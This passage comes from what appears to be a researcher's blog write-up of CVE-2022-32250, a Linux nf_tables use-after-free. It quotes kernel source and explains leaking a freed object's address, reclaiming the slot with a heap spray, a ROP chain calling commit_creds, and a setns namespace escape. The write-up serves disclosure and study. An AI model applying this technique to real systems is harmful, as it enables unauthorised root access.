	       <span class="p">(</span><span class="n">u64</span><span class="p">)</span><span class="n">nft_hash_buckets</span><span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">)</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">hlist_head</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">struct nft_hash</code> trails the <code class="language-plaintext highlighter-rouge">struct nft_set</code> and has a table member [1] that represents the hash table which holds the <code class="language-plaintext highlighter-rouge">nft_set_elem</code>s of that set. Each index of the table contains a <code class="language-plaintext highlighter-rouge">struct hlist_head</code> which is the head of a linked list that contains set elems that were hashed into that index in the table. Each <code class="language-plaintext highlighter-rouge">struct hlist_head</code> just contains a pointer to a <code class="language-plaintext highlighter-rouge">struct hlist_node</code> which is a node in the linked list as well as a member within a <code class="language-plaintext highlighter-rouge">struct nft_hash_elem</code> [2]. A pointer to an <code class="language-plaintext highlighter-rouge">nft_hash_elem</code> is stored as the <code class="language-plaintext highlighter-rouge">priv</code> member of an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> for hash type sets [3]. Basically, our set elem within our set is an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> with <code class="language-plaintext highlighter-rouge">priv</code> pointing to an <code class="language-plaintext highlighter-rouge">nft_hash_elem</code>, which itself contains a member <code class="language-plaintext highlighter-rouge">node</code> that is added to a linked list of a hash table for the set. If such a set elem is specified to have an object reference during creation, a pointer to the object is stored within the <code class="language-plaintext highlighter-rouge">ext</code> member of the elem [4]. The memory layout of the <code class="language-plaintext highlighter-rouge">nft_set</code> of type <code class="language-plaintext highlighter-rouge">nft_set_hash_type</code> is illustrated in the diagram following the function and struct definitions below.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_hash</span> <span class="p">{</span>
	<span class="n">u32</span>				<span class="n">seed</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">buckets</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">hlist_head</span>		<span class="n">table</span><span class="p">[];</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">hlist_head</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">hlist_node</span> <span class="o">*</span><span class="n">first</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">hlist_node</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">hlist_node</span> <span class="o">*</span><span class="n">next</span><span class="p">,</span> <span class="o">**</span><span class="n">pprev</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_hash_elem</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">hlist_node</span>       <span class="n">node</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">struct</span> <span class="n">nft_set_ext</span>      <span class="n">ext</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>		<span class="n">buf</span><span class="p">[</span><span class="n">NFT_DATA_VALUE_MAXLEN</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">)];</span>
		<span class="k">struct</span> <span class="n">nft_data</span>	<span class="n">val</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">key</span><span class="p">;</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>		<span class="n">buf</span><span class="p">[</span><span class="n">NFT_DATA_VALUE_MAXLEN</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">)];</span>
		<span class="k">struct</span> <span class="n">nft_data</span>	<span class="n">val</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">key_end</span><span class="p">;</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>		<span class="n">buf</span><span class="p">[</span><span class="n">NFT_DATA_VALUE_MAXLEN</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">)];</span>
		<span class="k">struct</span> <span class="n">nft_data</span> <span class="n">val</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">data</span><span class="p">;</span>
	<span class="kt">void</span>			<span class="o">*</span><span class="n">priv</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
<span class="p">};</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_add_set_elem</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
			    <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u32</span> <span class="n">nlmsg_flags</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_lookup</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>
				     <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">],</span>
				     <span class="n">set</span><span class="o">-&gt;</span><span class="n">objtype</span><span class="p">,</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">ext</span> <span class="o">=</span> <span class="n">nft_set_elem_ext</span><span class="p">(</span><span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="p">.</span><span class="n">priv</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
		<span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
		<span class="n">obj</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ ---------------------------------------------------------------------------------------------- +
| + -------------- + | + --------------------------------------------------------------------- + |
| | struct nft_set | | | struct nft_hash:  u32 seed | u32 buckets | struct hlist_head table[ ] | |
| + -------------- + | + --------------------------------------------------------------------- + |
+ ---------------------------------------------------------------------------------------------- +
</code></pre></div></div>

<p>We only have one <code class="language-plaintext highlighter-rouge">nft_set_elem</code> in our set, and to easily find its <code class="language-plaintext highlighter-rouge">node</code> member within the set’s hash table, we can ensure the table contains only one linked list (i.e. one hash bucket). This is controllable when creating the set. As a result, the <code class="language-plaintext highlighter-rouge">node</code> of our <code class="language-plaintext highlighter-rouge">nft_set_elem</code> can be found in the linked list at index 0 of the set’s hash table. Since that list contains only one entry (we created only one set elem successfully), we can leak the address of the <code class="language-plaintext highlighter-rouge">node</code> member of the <code class="language-plaintext highlighter-rouge">nft_hash_elem</code> by applying our read primitive to the address of the hash table (a <code class="language-plaintext highlighter-rouge">struct hlist_head</code>), which simply holds a pointer to the first <code class="language-plaintext highlighter-rouge">hlist_node</code>. With the address of the set elem’s <code class="language-plaintext highlighter-rouge">hlist_node</code>, we can then leak the freed <code class="language-plaintext highlighter-rouge">nft_object</code>’s address, since it lies within the <code class="language-plaintext highlighter-rouge">nft_set_ext</code> that follows the <code class="language-plaintext highlighter-rouge">hlist_node</code> inside the <code class="language-plaintext highlighter-rouge">nft_hash_elem</code>. We just need to compute the appropriate offsets from the <code class="language-plaintext highlighter-rouge">hlist_node</code> to the <code class="language-plaintext highlighter-rouge">nft_object</code> pointer within the <code class="language-plaintext highlighter-rouge">nft_set_ext</code>. With the leaked address, we now know the address we need the <code class="language-plaintext highlighter-rouge">eval</code> function pointer to point to.</p>

<h3 id="creating-an-objref-expression-trigger-for-rop">Creating an objref expression trigger for ROP</h3>

<p>The next step is to create an <code class="language-plaintext highlighter-rouge">objref</code> expression to an <code class="language-plaintext highlighter-rouge">nft_object</code> that fills the UAF slot, which is then freed and replaced with arbitrary data after. We perform a heap spray of <code class="language-plaintext highlighter-rouge">nft_object</code>s, find out which object was allocated into the previous freed memory location, create an <code class="language-plaintext highlighter-rouge">objref</code> expression to that particular object and finally destroy the <code class="language-plaintext highlighter-rouge">nft_object</code> again, while the <code class="language-plaintext highlighter-rouge">objref</code> continues to hold a pointer to the <code class="language-plaintext highlighter-rouge">nft_object</code>. The issue here is that the object now has use = 1 (which is a reference counting mechanism for <code class="language-plaintext highlighter-rouge">nft_object</code>s) after creating an <code class="language-plaintext highlighter-rouge">objref</code> that holds a pointer to it and it cannot be deleted directly by sending a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_DELOBJ</code>. However, this new object that we formed the <code class="language-plaintext highlighter-rouge">objref</code> expression to now lies in the UAF slot, and the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> in our anonymous set still mistakenly assumes it’s holding a valid pointer to an <code class="language-plaintext highlighter-rouge">nft_object</code> there. When we delete this set elem from the set without specifying the exact set elem to delete, <code class="language-plaintext highlighter-rouge">nf_tables_delsetelem</code> is called which calls <code class="language-plaintext highlighter-rouge">nft_set_flush</code> [1] and this in turn calls <code class="language-plaintext highlighter-rouge">nft_setelem_flush</code> [2] for every set elem in the set. <code class="language-plaintext highlighter-rouge">nft_setelem_flush</code> invokes <code class="language-plaintext highlighter-rouge">nft_setelem_data_deactivate</code> [3] which decrements the use of the <code class="language-plaintext highlighter-rouge">nft_object</code> it is referencing [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_delsetelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">table</span> <span class="o">=</span> <span class="n">nft_table_lookup</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_TABLE</span><span class="p">],</span> <span class="n">family</span><span class="p">,</span>
                                 <span class="n">genmask</span><span class="p">,</span> <span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_SET</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">])</span>
                <span class="k">return</span> <span class="n">nft_set_flush</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">genmask</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>

        <span class="n">nla_for_each_nested</span><span class="p">(</span><span class="n">attr</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">],</span> <span class="n">rem</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">nft_del_setelem</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_set_flush</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span> <span class="n">u8</span> <span class="n">genmask</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_set_iter</span> <span class="n">iter</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">genmask</span>        <span class="o">=</span> <span class="n">genmask</span><span class="p">,</span>
                <span class="p">.</span><span class="n">fn</span>             <span class="o">=</span> <span class="n">nft_setelem_flush</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="c1">// called for each elem in set-&gt;ops-&gt;walk</span>
        <span class="p">};</span>

        <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">walk</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">iter</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">iter</span><span class="p">.</span><span class="n">err</span><span class="p">)</span>
                <span class="n">iter</span><span class="p">.</span><span class="n">err</span> <span class="o">=</span> <span class="n">nft_set_catchall_flush</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>

        <span class="k">return</span> <span class="n">iter</span><span class="p">.</span><span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_setelem_flush</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                             <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_iter</span> <span class="o">*</span><span class="n">iter</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="o">*</span><span class="n">elem</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">trans</span> <span class="o">=</span> <span class="n">nft_trans_alloc_gfp</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">NFT_MSG_DELSETELEM</span><span class="p">,</span>
                                    <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_elem</span><span class="p">),</span> <span class="n">GFP_ATOMIC</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">trans</span><span class="p">)</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">flush</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="o">-&gt;</span><span class="n">priv</span><span class="p">))</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">set</span><span class="o">-&gt;</span><span class="n">ndeact</span><span class="o">++</span><span class="p">;</span>

        <span class="n">nft_setelem_data_deactivate</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="n">nft_trans_elem_set</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="n">set</span><span class="p">;</span>
        <span class="n">nft_trans_elem</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="n">elem</span><span class="p">;</span>
        <span class="n">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">trans</span><span class="p">);</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="nl">err1:</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_setelem_data_deactivate</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span>
                                        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                        <span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="o">*</span><span class="n">elem</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ext</span> <span class="o">*</span><span class="n">ext</span> <span class="o">=</span> <span class="n">nft_set_elem_ext</span><span class="p">(</span><span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="o">-&gt;</span><span class="n">priv</span><span class="p">);</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">nft_set_ext_exists</span><span class="p">(</span><span class="n">ext</span><span class="p">,</span> <span class="n">NFT_SET_EXT_DATA</span><span class="p">))</span>
                <span class="n">nft_data_release</span><span class="p">(</span><span class="n">nft_set_ext_data</span><span class="p">(</span><span class="n">ext</span><span class="p">),</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">dtype</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nft_set_ext_exists</span><span class="p">(</span><span class="n">ext</span><span class="p">,</span> <span class="n">NFT_SET_EXT_OBJREF</span><span class="p">))</span>
                <span class="p">(</span><span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">))</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">--</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This means that after we successfully delete the set elem, the <code class="language-plaintext highlighter-rouge">nft_object</code> it is referencing now has a use count of 0 and we can delete it by just sending a <code class="language-plaintext highlighter-rouge">NFT_MSG_DELOBJ</code> netlink message that will invoke <code class="language-plaintext highlighter-rouge">nf_tables_delobj</code> to delete the object, leaving us with an <code class="language-plaintext highlighter-rouge">objref</code> expression pointing to a freed slot that we can now fill with arbitrary data specified by an <code class="language-plaintext highlighter-rouge">nft_chain</code>’s userdata.</p>

<h3 id="rop-chain-execution-and-namespace-re-association">ROP chain execution and namespace re-association</h3>

<p>A point to note is that the <code class="language-plaintext highlighter-rouge">objref</code> expression belongs to an <code class="language-plaintext highlighter-rouge">nft_rule</code> and that rule is actually added to a basechain in <code class="language-plaintext highlighter-rouge">nf_tables</code>. A basechain is registered with a netfilter hook (in our case we set it to be an output hook) and this would act as a filter for outgoing packets for the system as rules in that chain will be used to process the traffic. In order to actually trigger the ROP chain, we just have to send a UDP datagram using the <code class="language-plaintext highlighter-rouge">sendto</code> syscall. This will result in <code class="language-plaintext highlighter-rouge">nft_do_chain</code> processing every expression in every rule for the chain, eventually invoking the <code class="language-plaintext highlighter-rouge">eval</code> function pointer (pointing to <code class="language-plaintext highlighter-rouge">nft_objref_eval</code>) on our <code class="language-plaintext highlighter-rouge">objref</code> expression. This triggers <code class="language-plaintext highlighter-rouge">obj-&gt;ops-&gt;eval</code> of the <code class="language-plaintext highlighter-rouge">nft_object</code> pointer stored in the <code class="language-plaintext highlighter-rouge">objref</code> expression. Recall that offset 128 from the start of the <code class="language-plaintext highlighter-rouge">nft_object</code> is where the <code class="language-plaintext highlighter-rouge">obj-&gt;ops-&gt;eval</code> function pointer is supposedly located. This means that if we spray <code class="language-plaintext highlighter-rouge">nft_chain</code>s, with ROP chain contents at the beginning of the chain’s <code class="language-plaintext highlighter-rouge">userdata</code> and offset 128 storing the starting address of the UAF slot, this will kick off execution of our shellcode. As the <code class="language-plaintext highlighter-rouge">eval</code> function is called with the <code class="language-plaintext highlighter-rouge">nft_object</code> (replaced with chain <code class="language-plaintext highlighter-rouge">userdata</code> now) itself as the first parameter, we can first perform a stack pivot in the ROP chain using a gadget similar to <code class="language-plaintext highlighter-rouge">push rdi; pop rsp; ret;</code>. In the rest of the ROP chain, the <code class="language-plaintext highlighter-rouge">init</code> process’ credentials are committed using <code class="language-plaintext highlighter-rouge">commit_creds(init_cred)</code> and <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_ret_to_usermode</code> is used to cleanly return to usermode, with the RIP in userland pointing to a function in the exploit code responsible for escaping the namespace jails and spawning a shell. The namespace jails are escaped using the <code class="language-plaintext highlighter-rouge">setns</code> syscall (for instance <code class="language-plaintext highlighter-rouge">setns(open("/proc/1/ns/net", O_RDONLY), 0);</code>) which re-associates that namespace of the process with that of the init process.</p>]]></content><author><name>kyeojy</name></author><category term="vulnerability" /><category term="exploitation" /><category term="linux" /><category term="kernel" /><category term="uaf" /><summary type="html"><![CDATA[This post explores the root cause and exploitation of CVE-2022-32250, a vulnerability I exploited for a successful demonstration at Pwn2Own Vancouver 2022, and also the first vulnerability I discovered. The issue was used to achieve local privilege escalation on Ubuntu 22.04 kernel 5.15.0-30-release.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://kyeojy.github.io/assets/og-image.png" /><media:content medium="image" url="https://kyeojy.github.io/assets/og-image.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>